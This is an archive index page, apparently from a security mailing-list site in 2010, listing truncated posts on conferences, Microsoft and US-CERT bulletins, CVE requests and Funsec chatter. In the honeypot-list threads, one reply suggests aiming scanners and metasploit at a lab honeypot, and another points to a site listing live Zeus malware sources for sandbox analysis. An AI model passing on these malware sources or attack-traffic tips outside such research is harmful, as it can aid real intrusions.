that need it or run another piece of software. I have a massive infection
that I cannot track down our Eset is catching them but my network is nothing
but...
Re: Brucon
Robin Wood (Sep 02)
This is the one we all stayed at last year
http://www.husapresidentpark.com/
Not too far from station, ok bar, standard hotel prices. Quite nice
hotel unless you got the room where the bathroom flooded, can't
remember who got that one.
I'll be there for the VOIP class so see you there.
Robin
Brucon
Nils (Sep 02)
Hi,
anyone going to Brucon and eventually to one of the classes prior?
Any hotel recommendations?
I'd like to go there the Tuesday prior to the class and check in late
afternoon.
Nils
Honeypots — Discussions about tracking attackers by setting up decoy honeypots or entire honeynet networks.
nullcon Goa dwitiya (2.0) Call For Papers
nullcon (Sep 01)
nullcon Dwitiya (2.0)
The Jugaad(hacking) Conference
nullcon is an initiative by null - The open security community.
Website:
http://nullcon.net
Calling all Jugaadus(hackers)
It's the time of the year when we welcome research done by the
community as paper submissions for nullcon.
So, sip your coffee, dust your debuggers, fire your tools, challenge
your grey cells and shoot us an email.
Tracks:
---------------
- Bakkar: 1 Hr Talks
-...
[HITB-Announce] HITB2010 SIGNINT Sessions
Hafez Kamal (Aug 26)
Hack In The Box is proud to announce, a brand new lightning session
called HITB SIGINT (Signal Intelligence/Interrupt)! HITB SIGINT
sessions are designed to provide a quick 15 minute overview for
material and research that's up and coming - stuff that isn't quite
ready for the mainstream tracks of the conference but deserve a mention
nonetheless. Final year students who want to present their projects to
industry experts are also strongly...
Re: honeypot needed for waf testing
Valdis . Kletnieks (Aug 24)
On Mon, 23 Aug 2010 08:21:29 PDT, false said:
There's tools to do specifically that. However, you probably already have many
of the tools you need - just point stuff like nmap and nessus at your honeypot
and see if your WAF notices. If it doesn't notice you doing the nmap, it won't
notice an attacker doing the nmap. If you have hping3, try sending a few
christmas-tree packets at your honeypot, see what happens. Get a copy of
metasploit and...
honeypot needed for waf testing
false (Aug 23)
I need to test my WAF. I want to set up a simple network in the lab like this:
XP or Linux client <--> WAF <--> Honeypot/test webserver
1) Does anyone have any suggestions on what I can use to simulate/generate attacks/suspicious traffic towards the
webserver from my client?
2) Is there a honeypot image out there that I can download that would be good to be the role of my test
webserver?
Any suggestions or ideas are very much...
Ruxcon 2010 Final Call For Papers
cfp (Aug 20)
RUXCON 2010 FINAL CALL FOR PAPERS
Ruxcon would like to announce the final call for papers for the sixth annual Ruxcon conference.
This year the conference will take place over the weekend of 20th and 21st of November.
Ruxcon will be held at CQ, Melbourne, Australia.
The deadline for submissions is the 10th of October.
What is Ruxcon?
Ruxcon is the premiere technical computer security conference within Australia. Ruxcon aspires to bring...
[HITB-Ann] Reminder: HITB2010 Malaysia Call for Papers Closing August 9th
Hafez Kamal (Jul 29)
This is a reminder that the Call for Papers for Asia's largest network
security event, HITBSecConf2010 - Malaysia is closing on the 9th of August!
This will be a QUAD TRACK conference featuring 2 dedicated tracks
focusing on cutting edge attack and defense techniques, a track with
dedicated hands-on lab sessions and a brand new lightning talk segment!
HITB CFP: http://cfp.hackinthebox.org/
===
Venue: Crowne Plaza Mutiara Kuala Lumpur...
[HITB-Announce] HITB Magazine Issue 003 + HITBSecConf2010 - Amsterdam
Hafez Kamal (Jul 04)
Our first ever HITBSecConf in Europe is over! A big big thank you to all
our sponsors, speakers, crew, volunteers and of course attendees who
made it over to join us!!!
We're already planning for 2011 and the tentative timing for the HITB
Europe is mid May (stay tuned to our @hitbsecconf twitter stream for all
conference updates).
All conference materials from the event can be downloaded from...
CFP: Deadline Extended: SLAML'10
Mohror, Kathryn (Jun 16)
Workshop on Managing Systems via Log Analysis and Machine
Learning Techniques (SLAML '10)
=============================================
October 2-3, 2010
Vancouver, BC, Canada
(at OSDI)
http://www.usenix.org/events/slaml10/cfp/
=============================================
********...
[HITB-Announce] HITBSecConf2010 - Malaysia Call for Papers
Hafez Kamal (May 19)
The Call for Papers for HITB Security Conference 2010 Malaysia is now open!
Talks that are more technical or that discuss new and never before seen
attack methods are of more interest than a subject that has been covered
several times before. Submissions are due no later than 9th August 2010.
HITB CFP: http://cfp.hackinthebox.org/
===
Date: October 11th - 14th 2010
Venue: Crowne Plaza Mutiara Kuala Lumpur
Keynote 1: Chris Wysopal...
RE: info reg Zeus bot detection and analysis
Younger Tyler (May 19)
Any tips on how to selectively get infected with Zeus?
You can find the latest Zeus variants here http://www.malwaredomainlist.com/mdl.php
Tyler
-----Original Message-----
From: listbounce () securityfocus com [mailto:listbounce () securityfocus com] On Behalf Of Michele Zoerb
Sent: Wednesday, May 19, 2010 11:39 AM
To: Mayank.2.Bhatnagar; honeypot honeypot
Subject: RE: info reg Zeus bot detection and analysis
Interesting thoughts as I am just...
RE: info reg Zeus bot detection and analysis
Gary Derania (May 19)
------Original Message------
From: "Michele Zoerb" <mzoerb () the41 com>
To: "Mayank.2.Bhatnagar" <MBhatnagar () ipolicynetworks com>"honeypot honeypot" <honeypots () securityfocus com>
Sent: Wed 2010-05-19 08:48
Subject: RE: info reg Zeus bot detection and analysis
Interesting thoughts as I am just starting the same type of project. I want to get infected by Zeus and perform some
analysis. I...
RE: info reg Zeus bot detection and analysis
Michele Zoerb (May 19)
Interesting thoughts as I am just starting the same type of project. I want to get infected by Zeus and perform some
analysis. I have a closed environment, but didn't think that detecting a virtual environment would be an issue for the
bot. I will put my VMconverter onto a separate machine and clone from there.
Any tips on how to selectively get infected with Zeus?
Thanks,
Chele
-----Original Message-----
From: listbounce () securityfocus...
info reg Zeus bot detection and analysis
Mayank.2.Bhatnagar (May 19)
Hi everyone,
We are able to collect several samples of Zeus bot and there are many variants of the same.
However when we try to analyse it in our sandbox and closed environment, we are not able to get any activity.
There are several reports available, which are for same md5sum sample but still after much of analysis and triggering
attempts, either the malicious sample doesn't trigger or if it does, it doesn't show any network activity.
What...
[HITB-Announce] HITB eZine Issue 002 out now!
Hafez Kamal (Apr 23)
The second quarterly HITB eZine (issue 002) has been released! Grab your
copies from here:
https://www.hackinthebox.org/modules.php?op=modload&name=News&file=article&sid=35995
===
3 months ago, our newly 'reborn' ezine was a completely new experience
to our small team and we didn't expect it to have a lot of followers
considering its absence for many years. But to our surprise, we received
over 20K downloads just weeks after its...
[HITB-Announce] FINAL CALL - CFP for HITBSecConf2010 Amsterdam
Hafez Kamal (Apr 08)
This is the FINAL CALL to submit your talk / presentation proposals for
the inaugural HITB Security Conference in Europe! Submissions are due
by 19TH APRIL 2010.
HITBSecConf2010 - Amsterdam takes place at the Grand Krasnapolsky from
the 29th of June till the 2nd of July (Tuesday - Friday) with keynote
speakers Anton Chuvakin and Mark Curphey in our _first ever_ QUAD TRACK
conference.
To submit your presentation proposals and for further details...
Microsoft Sec Notification — Beware that MS often uses these security bulletins as marketing propaganda to downplay serious vulnerabilities in their products—note how most have a prominent and often-misleading "mitigating factors" section.
Microsoft Security Bulletin Minor Revisions
Microsoft (Sep 01)
********************************************************************
Title: Microsoft Security Bulletin Minor Revisions
Issued: September 1, 2010
********************************************************************
Summary
=======
The following bulletins have undergone a minor revision increment.
Please see the appropriate bulletin for more details.
* MS10-056 - Critical
* MS10-049 - Critical
Bulletin Information:
=====================
*...
Microsoft Security Advisory Notification
Microsoft (Aug 31)
********************************************************************
Title: Microsoft Security Advisory Notification
Issued: August 31, 2010
********************************************************************
Security Advisories Updated or Released Today
==============================================
* Microsoft Security Advisory (2269637)
- Title: Insecure Library Loading Could Allow Remote
Code Execution
-...
Microsoft Security Bulletin Minor Revisions
Microsoft (Aug 25)
********************************************************************
Title: Microsoft Security Bulletin Minor Revisions
Issued: August 25, 2010
********************************************************************
Summary
=======
The following bulletins have undergone a minor revision increment.
Please see the appropriate bulletin for more details.
* MS10-056 - Critical
* MS10-054 - Critical
Bulletin Information:
=====================
*...
Microsoft Security Bulletin Minor Revision
Microsoft (Aug 24)
********************************************************************
Title: Microsoft Security Bulletin Minor Revision
Issued: August 24, 2010
********************************************************************
Summary
=======
The following bulletin has undergone a minor revision increment.
Please see the appropriate bulletin for more details.
* MS10-046 - Critical
Bulletin Information:
=====================
* MS10-046 - Critical
-...
Microsoft Security Advisory Notification
Microsoft (Aug 23)
********************************************************************
Title: Microsoft Security Advisory Notification
Issued: August 23, 2010
********************************************************************
Security Advisories Updated or Released Today
==============================================
* Microsoft Security Advisory (2269637)
- Title: Insecure Library Loading Could Allow Remote
Code Execution
-...
Microsoft Security Bulletin Minor Revisions
Microsoft (Aug 18)
********************************************************************
Title: Microsoft Security Bulletin Minor Revisions
Issued: August 18, 2010
********************************************************************
Summary
=======
The following bulletins have undergone a minor revision increment.
Please see the appropriate bulletin for more details.
* MS10-058 - Important
Bulletin Information:
=====================
* MS10-058 - Important...
Microsoft Security Bulletin Minor Revisions
Microsoft (Aug 11)
********************************************************************
Title: Microsoft Security Bulletin Minor Revisions
Issued: August 11, 2010
********************************************************************
Summary
=======
The following bulletins have undergone a minor revision increment.
Please see the appropriate bulletin for more details.
* MS10-060 - Critical
* MS10-057 - Important
* MS10-056 - Critical
* MS10-054 - Critical...
Microsoft Security Advisory Notification
Microsoft (Aug 10)
********************************************************************
Title: Microsoft Security Advisory Notification
Issued: August 10, 2010
********************************************************************
Security Advisories Updated or Released Today
==============================================
* Microsoft Security Advisory (977377)
- Title: Vulnerability in TLS/SSL Could Allow Spoofing
-...
Microsoft Security Bulletin Summary for August 2010
Microsoft (Aug 10)
********************************************************************
Microsoft Security Bulletin Summary for August 2010
Issued: August 10, 2010
********************************************************************
This bulletin summary lists security bulletins released for
August 2010.
The full version of the Microsoft Security Bulletin Summary for
August 2010 can be found at
http://www.microsoft.com/technet/security/bulletin/ms10-aug.mspx....
Microsoft Security Bulletin Advance Notification for August 2010
Microsoft (Aug 05)
********************************************************************
Microsoft Security Bulletin Advance Notification for August 2010
Issued: August 5, 2010
********************************************************************
This is an advance notification of security bulletins that
Microsoft is intending to release on August 10, 2010.
The full version of the Microsoft Security Bulletin Advance
Notification for August 2010 can be found at...
Microsoft Security Bulletin Minor Revisions
Microsoft (Aug 03)
********************************************************************
Title: Microsoft Security Bulletin Minor Revisions
Issued: August 3, 2010
********************************************************************
Summary
=======
The following bulletins have undergone a minor revision increment.
Please see the appropriate bulletin for more details.
* MS10-046 - Critical
Bulletin Information:
=====================
* MS10-046 - Critical
-...
Microsoft Security Bulletin Summary for August 2010
Microsoft (Aug 02)
********************************************************************
Microsoft Security Bulletin Summary for August 2010
Issued: August 2, 2010
********************************************************************
This bulletin summary lists the out-of-band security bulletin
released on August 2, 2010.
The full version of the Microsoft Security Bulletin Summary for
August 2010 can be found at...
Microsoft Security Bulletin Advance Notification for August 2010
Microsoft (Jul 30)
********************************************************************
Microsoft Security Bulletin Advance Notification for August 2010
Issued: July 30, 2010
********************************************************************
This is an advance notification of one out-of-band security bulletin
that Microsoft is intending to release on August 2, 2010.
The full version of the Microsoft Security Bulletin Advance
Notification for August 2010 can be...
Microsoft Security Bulletin Minor Revision
Microsoft (Jul 21)
********************************************************************
Title: Microsoft Security Bulletin Minor Revision
Issued: July 21, 2010
********************************************************************
Summary
=======
The following bulletin has undergone a minor revision increment.
* MS09-014 - Critical
Bulletin Information:
=====================
* MS09-014 - Critical
-...
Microsoft Security Advisory Notification
Microsoft (Jul 20)
********************************************************************
Title: Microsoft Security Advisory Notification
Issued: July 20, 2010
********************************************************************
Security Advisory Updated Today
==============================================
* Microsoft Security Advisory (2286198)
- Title: Vulnerability in Windows Shell Could Allow
Remote Code Execution
-...
Funsec — While most security lists ban off-topic discussion, Funsec is a haven for free community discussion and enjoyment of the lighter, more humorous side of the security community
Re: Do you have a lethargic whale on your hands?
Robert Portvliet (Sep 02)
Apparently this has been done a few times, but my favourite is this, uh..
incident: http://www.youtube.com/watch?v=ZFwxH3PPWiU
Re: Snoop Dogg's Magic Symantec Bus
Dave Paris (Sep 02)
Prizes
[...]
* Opportunity to meet with Snoop’s management or agent
o_O ..wtf?! why would I ever want to meet someone's manager or agent?
#$(%ing idiots.
Hawks major source of communications disruption
Rob, grandpa of Ryan, Trevor, Devon & Hannah (Sep 02)
Have all of you got BCP or incident response in place to deal with hawk attacks?
(And I'm not just talking about Tea Party Republicans.)
http://www.cbc.ca/canada/calgary/story/2010/09/01/calgary-bayview-hawk-attack-mail-canadapost.html
====================== (quote inserted randomly by Pegasus Mailer)
rslade () vcn bc ca slade () victoria tc ca rslade () computercrime org
Now, while the War Office has not yet ascertained what...
Examination of OAuth and Twitter's implementation
Rob, grandpa of Ryan, Trevor, Devon & Hannah (Sep 02)
http://bit.ly/8X141k+
http://arstechnica.com/security/guides/2010/09/twitter-a-case-study-on-how-to-do-oauth-wrong.ars/
====================== (quote inserted randomly by Pegasus Mailer)
rslade () vcn bc ca slade () victoria tc ca rslade () computercrime org
Our enemies are innovative and resourceful, and so are we. They
never stop thinking about new ways to harm our country and our
people, and neither do we....
Re: Do you have a lethargic whale on your hands?
Rob, grandpa of Ryan, Trevor, Devon & Hannah (Sep 02)
Is that a personal comment about some of us?
====================== (quote inserted randomly by Pegasus Mailer)
rslade () vcn bc ca slade () victoria tc ca rslade () computercrime org
Security is difficult, President. Anyone who says differently is
selling something. - The Paranoid Guide
victoria.tc.ca/techrev/rms.htm blog.isc2.org/isc2_blog/slade/index.html...
Re: Quantum system hacked in 'blinding' attack
Dan Kaminsky (Sep 02)
Yeah, this keeps happening. See:
http://www.scribd.com/doc/19003834
The general problem is that the quantum guys keep treating photons, and
photon detectors, as systems that do only what they are specified. An
equivalent might be a system that is only audited on TCP port 80, but
unfortunately there's a few dozen more ports open.
Re: Snoop Dogg's Magic Symantec Bus
Skyler King (Sep 02)
http://hackiswack.com
Patents, philanthropy, and other disasters ...
Rob, grandpa of Ryan, Trevor, Devon & Hannah (Sep 02)
A rather depressing story: everyone supposedly full of good intentions, and yet
lots of tragedy to go around.
http://www.nytimes.com/2010/09/05/magazine/05Plumpy-t.html
====================== (quote inserted randomly by Pegasus Mailer)
rslade () vcn bc ca slade () victoria tc ca rslade () computercrime org
Any noun can be verbed. - Alan J. Perlis
victoria.tc.ca/techrev/rms.htm...
Do you have a lethargic whale on your hands?
Ned Fleming (Sep 02)
Life imitates The Simpsons:
http://www.telegraph.co.uk/earth/wildlife/7977013/Whale-put-to-death-with-explosives.html
Quantum system hacked in 'blinding' attack
Jeffrey Walton (Sep 02)
http://www.v3.co.uk/v3/news/2268908/quantum-system-hacked-blinding
Re: Poor quantum encryption
Dave Paris (Sep 02)
I want to move to Theory. Everything works there.
Krebs: FCC Must Make ISPs Crack Down on Spammers and Malware
Paul Ferguson (Sep 01)
Via CSO Online.
[snip]
The Federal Communications Commission (FCC) is asking for help in
developing a "Cybersecurity Roadmap," an ambitious plan to identify
dangerous vulnerabilities in the Internet infrastructure, as well as
threats to consumers, businesses and governments.
The one piece of advice I will offer the commission is to begin measuring
the responsiveness of Internet service providers (ISPs) and hosting
companies in...
Researchers knock part of the Internet offline
Jeffrey Walton (Sep 01)
http://gcn.com/articles/2010/08/31/internet-experiment-goes-awry.aspx
Poor quantum encryption
Rob, grandpa of Ryan, Trevor, Devon & Hannah (Sep 01)
Theoretically perfect, and so full of holes ...
http://www.v3.co.uk/v3/news/2268908/quantum-system-hacked-blinding
====================== (quote inserted randomly by Pegasus Mailer)
rslade () vcn bc ca slade () victoria tc ca rslade () computercrime org
[V]isions of those notorious $900 Gucci dog bowls flit through
your mind, and you're haunted by the possibility that your
cynicism isn't polished enough to second-guess the world's...
Snoop Dogg's Magic Symantec Bus
Shawn Merdinger (Sep 01)
http://www.huffingtonpost.com/2010/08/31/snoop-dogg-raps-about-cyb_n_700876.html
"The legendary LBC rapper held court inside a Symantec Corporation
18-wheeler across from Bryant Park..."
CERT Advisories — The Computer Emergency Response Team has been responding to security incidents and sharing vulnerability information since the Morris Worm hit in 1986. This archive combines their technical security alerts, tips, and current activity lists.
Current Activity - Insecure Loading of Dynamic Link Libraries in Windows Applications
Current Activity (Sep 01)
US-CERT Current Activity
Insecure Loading of Dynamic Link Libraries in Windows Applications
Original release date: August 25, 2010 at 12:01 pm
Last revised: September 1, 2010 at 10:27 am
US-CERT is aware of a class of vulnerabilities related to how some
Windows applications may load external dynamic link libraries (DLLs).
When an application loads a DLL without specifying a fully qualified
path name, Windows will attempt to locate the DLL by...
Current Activity - VMware Releases Updates for ESX Service Console Packages
Current Activity (Sep 01)
US-CERT Current Activity
VMware Releases Updates for ESX Service Console Packages
Original release date: September 1, 2010 at 9:32 am
Last revised: September 1, 2010 at 9:32 am
VMware has released security updates for multiple third party packages
for the ESX Service Console. These updates address vulnerabilities in
the perl, krb5, samba, tar, and cpio packages. Exploitation of these
vulnerabilities may allow an attacker to execute arbitrary...
Current Activity - RealNetworks Releases Update to Address Vulnerabilities in RealPlayer
Current Activity (Aug 31)
US-CERT Current Activity
RealNetworks Releases Update to Address Vulnerabilities in RealPlayer
Original release date: August 31, 2010 at 8:23 am
Last revised: August 31, 2010 at 8:23 am
RealNetworks, Inc. has released an update for RealPlayer to address
multiple vulnerabilities. These vulnerabilities may allow a remote,
unauthenticated attacker to execute arbitrary code or obtain sensitive
information.
US-CERT encourages users and...
Current Activity - Cisco Releases Security Advisory for IOS XR Software Border Gateway Protocol
Current Activity (Aug 31)
US-CERT Current Activity
Cisco Releases Security Advisory for IOS XR Software Border Gateway Protocol
Original release date: August 31, 2010 at 8:40 am
Last revised: August 31, 2010 at 8:40 am
Cisco has released a security advisory to address a vulnerability in
the Cisco IOS XR Software Border Gateway Protocol feature.
Exploitation of this vulnerability may result in the continuous
resetting of BGP peering sessions, which may cause a...
TA10-238A -- Microsoft Windows Insecurely Loads Dynamic Libraries
US-CERT Technical Alerts (Aug 26)
National Cyber Alert System
Technical Cyber Security Alert TA10-238A
Microsoft Windows Insecurely Loads Dynamic Libraries
Original release date: August 26, 2010
Last revised: --
Source: US-CERT
Systems Affected
Any application running on the Microsoft Windows platform that
uses dynamically linked libraries (DLLs) may be affected. Whether
or not an application is vulnerable depends on...
Current Activity - Cisco Releases Advisories for Unified Communications Manager and Unified Presence
Current Activity (Aug 25)
US-CERT Current Activity
Cisco Releases Advisories for Unified Communications Manager and Unified Presence
Original release date: August 25, 2010 at 1:53 pm
Last revised: August 25, 2010 at 1:53 pm
Cisco has released security advisories to address multiple
vulnerabilities affecting Unified Communications Manager and Unified
Presence.
These vulnerabilities affect the processing of Session Initiation
Protocol (SIP) messages. Exploitation of...
Current Activity - APWG Fax Back Phishing Education Program
Current Activity (Aug 25)
US-CERT Current Activity
APWG Fax Back Phishing Education Program
Original release date: August 25, 2010 at 1:16 pm
Last revised: August 25, 2010 at 1:16 pm
In an effort to respond to a growing public threat by offline phishers
that conduct various scams via fax, the Anti-phishing Working Group
(APWG) has partnered with the Internal Revenue Service (IRS) to create
the APWG Fax Back Phishing Education Program. This program is designed
to...
Current Activity - Insecure Loading of Dynamic Link Libraries in Windows Applications
Current Activity (Aug 25)
US-CERT Current Activity
Insecure Loading of Dynamic Link Libraries in Windows Applications
Original release date: August 25, 2010 at 12:01 pm
Last revised: August 25, 2010 at 12:01 pm
US-CERT is aware of a class of vulnerabilities related to how some
Windows applications may load external dynamic link libraries (DLLs).
When an application loads a DLL without specifying a fully qualified
path name, Windows will attempt to locate the DLL by...
Cyber Security Tip ST05-014 -- Real-World Warnings Keep You Safe Online
US-CERT Security Tips (Aug 25)
Cyber Security Tip ST05-014
Real-World Warnings Keep You Safe Online
Many of the warning phrases you probably heard from your parents and
teachers are also applicable to using computers and the internet.
Why are these warnings important?
Like the real world, technology and the internet present dangers as well as
benefits. Equipment fails, attackers may target you, and mistakes and poor...
Current Activity - Adobe Releases Security Bulletin for Shockwave Player
Current Activity (Aug 25)
US-CERT Current Activity
Adobe Releases Security Bulletin for Shockwave Player
Original release date: August 25, 2010 at 8:15 am
Last revised: August 25, 2010 at 8:15 am
Adobe has released a security update to address multiple
vulnerabilities affecting Shockwave Player 11.5.7.609 and earlier
versions. These vulnerabilities may allow an attacker to execute
arbitrary code.
US-CERT encourages users and administrators to review Adobe security...
Current Activity - Apple Releases Security Update 2010-005
Current Activity (Aug 25)
US-CERT Current Activity
Apple Releases Security Update 2010-005
Original release date: August 25, 2010 at 8:15 am
Last revised: August 25, 2010 at 8:15 am
Apple has released security update 2010-005 to address multiple
vulnerabilities affecting the ATS, CFNetwork, ClamAV, CoreGraphics,
libsecurity, PHP, and Samba applications. These vulnerabilities may
allow an attacker to execute arbitrary code, obtain sensitive
information, cause a...
Current Activity - Microsoft Releases Security Advisory
Current Activity (Aug 24)
US-CERT Current Activity
Microsoft Releases Security Advisory
Original release date: August 24, 2010 at 11:42 am
Last revised: August 24, 2010 at 11:42 am
Microsoft has released a security advisory indicating that it is aware
of a remote attack vector for a class of vulnerabilities related to
how applications load external dynamic link libraries (DLLs). If an
application does not securely load DLL files, an attacker may be able
to cause the...
Current Activity - Google Releases Chrome 5.0.375.127
Current Activity (Aug 20)
US-CERT Current Activity
Google Releases Chrome 5.0.375.127
Original release date: August 20, 2010 at 8:47 am
Last revised: August 20, 2010 at 8:47 am
Google has released Chrome 5.0.375.127 for Windows, Mac, and Linux to
address multiple vulnerabilities. These vulnerabilities may allow an
attacker to execute arbitrary code, cause a denial-of-service
condition, or conduct spoofing attacks.
US-CERT encourages users and administrators to review...
TA10-231A -- Adobe Reader and Acrobat Vulnerabilities
US-CERT Technical Alerts (Aug 19)
National Cyber Alert System
Technical Cyber Security Alert TA10-231A
Adobe Reader and Acrobat Vulnerabilities
Original release date: August 19, 2010
Last revised: --
Source: US-CERT
Systems Affected
* Adobe Reader 9.3.3 and earlier versions for Windows, Macintosh, and UNIX
* Adobe Acrobat 9.3.3 and earlier versions for Windows and Macintosh
* Adobe Reader 8.2.3 and earlier versions...
Current Activity - Cisco IOS Software Vulnerability
Current Activity (Aug 13)
US-CERT Current Activity
Cisco IOS Software Vulnerability
Original release date: August 13, 2010 at 8:22 am
Last revised: August 13, 2010 at 8:22 am
Cisco has released a security advisory to address a vulnerability
affecting IOS Software Release 1.5.1(2)T. This vulnerability may allow
an attacker to cause a denial-of-service condition by sending a
specially crafted packet through normal network traffic.
US-CERT encourages users and...
Open Source Security — Discussion of security flaws, concepts, and practices in the Open Source community
Re: CVE id request: libc fortify source information disclosure
Dan Rosenberg (Sep 02)
I retract my previous statement - you're correct that the backtrace
also can reveal this same information. Perhaps this is an acceptable
risk, since I can't think of a single real-life case where this would
have actually been useful to an attacker (although it's not too hard
to imagine such a situation). Or perhaps printing out any of this
information to unprivileged users running suid applications should be
reconsidered.
-Dan
Re: CVE id request: libc fortify source information disclosure
Tomas Hoger (Sep 02)
In case of stack protector failed check, it's still an attempt to
print-out info based on what's known to be (partially) corrupted.
Re: CVE id request: libc fortify source information disclosure
Dan Rosenberg (Sep 02)
Tomas,
You are correct. Both the __stack_chk_fail(), which is inserted due
to stack protection, and the more general __chk_fail(), which is
inserted due to FORTIFY_SOURCE and may trigger for static buffer
overflows in other segments, call out to the same __fortify_fail()
function to print out the stack trace.
The backtrace or memory map don't really contain any potentially
sensitive information that couldn't be obtained otherwise. It's just...
Re: CVE id request: libc fortify source information disclosure
Tomas Hoger (Sep 02)
For the sake of correctness, the protective technology that kicks in in
Dan's example is the stack protector, not FORTIFY_SOURCE. Though it's
probably still glibc to blame for using the same error-reporting
function in both cases.
It seems the fix would need to remove all possibly-useful info from the
error message.
CVE-2010-2960 kernel: keyctl_session_to_parent null ptr deref
Eugene Teo (Sep 01)
Reported by Tavis Ormandy.
Patches (not in upstream yet):
https://bugzilla.redhat.com/show_bug.cgi?id=627440#c4
https://bugzilla.redhat.com/show_bug.cgi?id=627440#c5
You might need to comment out all the pam_keyinit calls in /etc/pam.d/
to reproduce the problem if the version of the kernel you are using is
affected.
Introduced via upstream commit ee18d64c (v2.6.32-rc1).
References:
https://bugzilla.redhat.com/CVE-2010-2960...
Re: CVE Request -- phpMyAdmin - v3.6.6 -- XSS attack using debugging messages (CVE-2010-3056 discussion)
Josh Bressers (Sep 01)
Please use CVE-2010-2958
Thanks.
CVE Request -- phpMyAdmin - v3.6.6 -- XSS attack using debugging messages (CVE-2010-3056 discussion)
Jan Lieskovsky (Sep 01)
Hi Steve, vendors,
on 2010-08-30 phpMyAdmin published PMASA-2010-6 addressing one XSS:
[1] http://www.phpmyadmin.net/home_page/security/PMASA-2010-6.php
Summary (from [1]):
XSS attack using debugging messages.
Description (from [1]):
It was possible to conduct a XSS attack using error messages in PHP backtrace.
Affected versions (from [1]):
For 3.x: versions before 3.3.6 are affected.
Branch 2.11.x is not...
CVE-2010-2954 kernel: irda null ptr deref
Eugene Teo (Aug 31)
Reported by Taviso Ormandy.
Patch at: http://www.spinics.net/lists/netdev/msg139404.html.
References:
https://bugzilla.redhat.com/CVE-2010-2954
http://twitter.com/taviso/status/22635752128
Quick check, introduced in 61e44b48 (v2.6.24 and above).
Thanks, Eugene
Re: CVE Request: BGP protocol vulnerability
Steven M. Christey (Aug 31)
The way Cisco has written up this CVE, they are clearly focusing on the
generation of corrupted attributes, not a protocol problem. So, I'd want
a separate CVE for the general BGP design issue.
I can't quite tell the difference between CVE-2009-2055 and what Florian
is requesting a CVE for. In CVE-2009-2055, Cisco seems to be implying
that it's a problem in XR, not the design of the whole protocol - but it's
not immediately clear if they...
Re: CVE id request: libc fortify source information disclosure
Steven M. Christey (Aug 31)
I think this technically qualifies as an "exposure" which is the "E" in
"CVE" - it can be used as a stepping stone for exploitation of another
vulnerability. (Very old, unwieldy definitions here:
http://cve.mitre.org/about/terminology.html)
The risk may be very minimal, but the FORTIFY_SOURCE protection mechanism
is not working "as advertised" - it can be manipulated for an
admittedly-small...
Re: CVE id request: libc fortify source information disclosure
Josh Bressers (Aug 31)
----- "Nico Golde" <oss-security+ml () ngolde de> wrote:
Steve,
What is MITRE policy on this one? By itself I question if this is a
security flaw, but it also would appear to have the potential to turn a DoS
into something worse.
I'm not sure what policy is in this instance.
Thanks.
Re: CVE request: serendipity < 1.5.4 xss
Josh Bressers (Aug 31)
Please use CVE-2010-2957
Thanks.
Re: [PATCH] exec argument expansion can inappropriately trigger OOM-killer
Tetsuo Handa (Aug 31)
Brad Spengler wrote:
As far as I know, RHEL >= 5.3 and Asianux >= 3.2 backported this functionality.
Re: [PATCH] exec argument expansion can inappropriately trigger OOM-killer
Solar Designer (Aug 31)
Brad, Roland -
Thank you for your comments and your work on this.
Agreed.
Alexander
Re: [PATCH] exec argument expansion can inappropriately trigger OOM-killer
Roland McGrath (Aug 31)
This can't be so. There are already many possibilities for preemption
in the get_user_pages code paths (called from get_arg_page).
Indeed, this too is a clear indication that preemption here is already safe.
What "change"? Preemption is already possible, that's nothing new.
The only difference is that we might notice TIF_SIGPENDING having been
set, and bail out either before or after prepare_binprm, and so never
call...
Secure Coding — The Secure Coding list (SC-L) is an open forum for the discussion on developing secure applications. It is moderated by the authors of Secure Coding: Principles and Practices.
Re: Recent technical reports from the CERT Secure Coding Initiative
Jonathan Leffler (Aug 23)
Thanks for the reports, Robert.
Specifications for Managed Strings, Second Edition
Hal Burch, Fred Long, Raunak Rungta, Robert C. Seacord, & David Svoboda
CMU/SEI-2010-TR-018
This report describes a managed string library for the C programming
language. [...]
cover date: May 2010
http://www.sei.cmu.edu/library/abstracts/reports/10tr018.cfm
In the managed string library report, there's a paragraph on p5 that reads:...
[OWASP] APPSEC BRAZIL 2010 - REGISTRATIONS OPEN!
Leonardo Buonsanti (Aug 23)
Greetings everyone!
We're proud to announce that the OWASP's AppSec Brazil 2010 Conference
registrations are officially open!
Early bird offers are available! Hurry up!
This year we'll have keynotes by Robert 'Rsnake' Hansen and Jeremiah
Grossman and Samy Kamkar as a Special Speaker!
Registrations are available here:
http://www.owasp.org/index.php/AppSec_Brasil_2010#tab=Registration
All info about the event can be found at:...
SB53: Richard Bejtlich
Gary McGraw (Aug 23)
hi sc-l,
The 53rd (!!) monthly episode of the Silver Bullet Security Podcast is an interview with Richard Bejtlich. Richard is
a well known expert in network monitoring, a subject he has written a book about. Richard is also very knowledgeable
about software security. In fact, I wish that more ops people knew as much as Richard does about software security!
Richard now works for GE and has plenty to say about interfacing with a huge...
Building Real Software: Has Static Analysis reached its limits?
Kenneth Van Wyk (Aug 20)
FYI, nice write-up on the Fortify acquisition as well as the static code analysis space here:
http://swreflections.blogspot.com/2010/08/has-static-analysis-reached-its-limits.html
Cheers,
Ken
-----
Kenneth R. van Wyk
KRvW Associates, LLC
http://www.KRvW.com
Follow us on Twitter at: http://twitter.com/KRvW_Associates
Ruxcon 2010 Final Call For Papers
cfp (Aug 20)
RUXCON 2010 FINAL CALL FOR PAPERS
Ruxcon would like to announce the final call for papers for the sixth annual Ruxcon conference.
This year the conference will take place over the weekend of 20th and 21st of November.
Ruxcon will be held at CQ, Melbourne, Australia.
The deadline for submissions is the 10th of October.
What is Ruxcon?
Ruxcon is the premiere technical computer security conference within Australia. Ruxcon aspires to bring...
Software Security Crosses the Threshold
Gary McGraw (Aug 17)
hi sc-l,
As many of you know, I have been collecting and publishing information about the software security space from a
business perspective for several years running. In 2009, revenues from tools and services companies in the software
security market exceeded $500 million. This is an important threshold for multiple reasons: the space continues to
grow even in uncertain economic times, a middle market of small and medium size businesses...
Re: Computerworld: Opinion - Making apps secure is hard work
Gunnar Peterson (Aug 12)
Hi Ken,
You raise some important points. Most infosec is approached as a set of controls, but access control only takes you so
far in the face of malice.
I like this quote from G.K. Chesterton
"The real trouble with this world of ours is not that it is an unreasonable world, nor even that it is a reasonable
one. The commonest kind of trouble is that it is nearly reasonable, but not quite. Life is not an illogicality; yet it
is a trap...
Computerworld: Opinion - Making apps secure is hard work
Kenneth Van Wyk (Aug 12)
I figured this was relevant here, so here's a link to my August column for Computerworld.
Excerpt:
'What's that you say? All the app vetting you've been doing to date consists only of verifying that the apps play by
